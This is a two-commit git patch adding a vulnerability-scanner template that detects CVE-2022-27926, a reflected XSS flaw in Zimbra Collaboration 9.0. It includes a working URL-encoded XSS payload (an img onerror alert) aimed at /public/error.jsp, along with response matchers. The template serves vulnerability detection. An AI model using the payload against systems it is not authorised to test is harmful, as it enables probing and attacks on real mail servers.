From 095f057f4c87daabc7ed4a286aaabb54a03e0e82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 13 Apr 2023 18:02:48 +0530 Subject: [PATCH 1/2] Create CVE-2022-27926.yaml --- cves/2022/CVE-2022-27926.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2022/CVE-2022-27926.yaml diff --git a/cves/2022/CVE-2022-27926.yaml b/cves/2022/CVE-2022-27926.yaml new file mode 100644 index 0000000000..1cb9f657b7 --- /dev/null +++ b/cves/2022/CVE-2022-27926.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-27926 + +info: + name: Zimbra Collaboration (ZCS) - Cross Site Scripting + author: rootxharsh,iamnoooob,pdresearch + severity: medium + description: | + A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-27926 + - https://wiki.zimbra.com/wiki/Security_Center + - https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24 + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-27926 + cwe-id: CWE-79 + epss-score: 0.01319 + cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* + tags: cve,cve2022,zimbra,xss,kev + +requests: + - method: GET + path: + - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + + matchers: + - type: word + part: body + words: + - '"><img src=x onerror=alert(document.domain)> - ???">' From 6751f633e63f8c2d407cb64cea2f33a4eabccaad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 17 Apr 2023 18:23:42 +0530 Subject: [PATCH 2/2] updated matcher and metadata --- cves/2022/CVE-2022-27926.yaml | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-27926.yaml b/cves/2022/CVE-2022-27926.yaml index 1cb9f657b7..80a0661799 100644 --- a/cves/2022/CVE-2022-27926.yaml +++ b/cves/2022/CVE-2022-27926.yaml @@ -18,6 +18,8 @@ info: cwe-id: CWE-79 epss-score: 0.01319 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* + metadata: + verified: "true" tags: cve,cve2022,zimbra,xss,kev requests: @@ -25,8 +27,18 @@ requests: path: - "{{BaseURL}}/public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" + matchers-condition: and matchers: - type: word part: body words: - - '<title>"><img src=x onerror=alert(document.domain)> - ???">' + - '<img src=x onerror=alert(document.domain)>Title???' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200